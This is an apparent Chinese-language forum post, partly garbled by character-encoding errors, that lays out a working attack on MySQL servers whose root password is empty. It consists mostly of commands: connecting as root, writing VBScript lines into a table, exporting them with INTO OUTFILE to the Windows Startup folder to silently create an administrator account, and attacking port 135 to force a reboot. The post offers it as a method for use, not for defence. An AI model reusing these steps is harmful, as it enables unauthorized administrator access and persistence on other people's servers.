前天,我發(fā)了一張關(guān)于MYSQL用戶ROOT密碼為空的貼,在網(wǎng)上我也找到一些利用此漏洞的方法,一般就是寫一個ASP或PHP的后門,不僅很麻煩,而且還要猜解網(wǎng)站的目錄,如果對方?jīng)]有開IIS,那我們豈不沒辦法了??
后來,自己思索想到一個辦法,在我測試的幾臺有此漏洞的機(jī)中均獲得了成功,現(xiàn)將我的攻擊方法公布如下:
1、連接到對方MYSQL 服務(wù)器
mysql -u root -h 192.168.0.1
mysql.exe 這個程序在你安裝了MYSQL的的BIN目錄中
2、讓我們來看看服務(wù)器中有些什么數(shù)據(jù)庫
mysql>show databases;
MYSQL默認(rèn)安裝時會有MYSQL、TEST這兩個數(shù)據(jù)庫,如果你看到有其它的數(shù)據(jù)庫那么就是用戶自建的數(shù)據(jù)庫。
3、讓我們進(jìn)入數(shù)據(jù)庫
mysql>use test;
我們將會進(jìn)入test數(shù)據(jù)庫中
4、查看我們進(jìn)入數(shù)據(jù)庫中有些什么數(shù)據(jù)表
mysql>show tables;
默認(rèn)的情況下,test中沒有任何表的存在。
以下為關(guān)鍵的部分
5、在TEST數(shù)據(jù)庫下創(chuàng)建一個新的表;
mysql>create table a (cmd text);
好了,我們創(chuàng)建了一個新的表,表名為a,表中只存放一個字段,字段名為cmd,為text文本。
6、在表中插入內(nèi)容
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user zjl317 zjl317 /add"",0) " );
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators zjl317 /add"",0) " );
注意雙引號和括號以及后面的“0”一定要輸入!我們將用這三條命令來建立一個VBS的腳本程序!
7、好了,現(xiàn)在我們來看看表a中有些什么
mysql>select * from a;
我們將會看到表中有三行數(shù)據(jù),就是我們剛剛輸入的內(nèi)容,確認(rèn)你輸入的內(nèi)容無誤后,我們來到下一步
8、輸出表為一個VBS的腳本文件
mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\「開始」菜單\\程序\\啟動\\a.vbs";
我們把我們表中的內(nèi)容輸入到啟動組中,是一個VBS的腳本文件!注意“\"符號。
9、看到這大家肯定知道了,就是利用MYSQL輸出一個可執(zhí)行的文件而已。為什么不用BAT呢,因為啟動運行時會有明顯的DOS窗口出來,而用VBS腳本則可以完全隱藏窗口且不會有錯誤提示!本來,應(yīng)該還有一句完成腳本后自動刪除此腳本的,但是中文目錄實在無法處理,只有作罷!好了,找個工具攻擊135讓服務(wù)器重啟吧,幾分鐘以后你就是管理員了。